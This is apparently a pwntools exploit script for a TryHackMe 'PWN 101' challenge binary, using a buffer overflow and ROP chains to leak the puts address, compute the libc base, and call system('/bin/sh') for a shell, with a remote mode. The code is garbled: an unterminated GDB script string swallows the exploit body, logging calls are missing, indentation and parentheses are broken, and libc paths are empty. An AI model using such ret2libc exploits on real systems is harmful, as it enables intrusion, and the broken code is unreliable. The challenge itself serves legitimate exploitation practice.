THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
# Path to the challenge binary.  The parsed ELF is both kept locally and
# registered as pwntools' context binary so the helpers used later
# (ROP(), fit(), u64()) are configured from the target itself.
exe = "./pwn109.pwn109"
elf = ELF(exe, checksec=False)
context.binary = elf
# 'info' keeps the progress messages visible without debug noise.
context.log_level = 'info'
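def start(argv=None, *a, **kw):
    """Launch the target and return the pwntools tube talking to it.

    The backend is chosen from pwntools' ``args`` flags: ``GDB`` runs the
    binary under a debugger driven by the module-level ``gdbscript``
    (looked up at call time, so it may be defined later in the module),
    ``REMOTE`` connects to the host and port given as the script's first two
    command-line arguments, and otherwise the binary is started as a local
    process.

    Args:
        argv: extra arguments appended after ``exe``; ``None`` (the default)
            means none.  A ``None`` default replaces the original shared
            mutable list so no caller can observe another's mutations.
        *a, **kw: forwarded unchanged to the selected pwntools launcher.

    Returns:
        Whatever ``gdb.debug``, ``remote`` or ``process`` returns.
    """
    argv = [] if argv is None else argv
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        # Host and port come from the script's own argv, not from ``argv``.
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + argv, *a, **kw)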
# Specific your GDB script here for debugging
gdbscript = '''
offset = 32 + 8 # Adjust for buffer + RBP "Starting exploit run..." )
p = start() "Building ROP chain to calc libc addr..." )
rop = ROP(elf) # Stack align with extra 'ret' to deal with movaps issue
rop.puts( "Sending payload..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
puts_str = p.recvline()
puts_addr = u64(puts_str.strip().ljust(8, b"\x00")) "Puts is at %#x", puts_addr )
if args.REMOTE:
libc = ELF("", checksec=False)
libc = ELF("", checksec=False)
libc.address = puts_addr - libc.sym.puts "libc base is at %#x", libc.address ) "Building ROP chain to exec shell..." )
rop = ROP(libc) # Stack align with extra 'ret' to deal with movaps issue
rop.system(next('/bin/sh')), 0, 0) "Sending payload to get shell..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )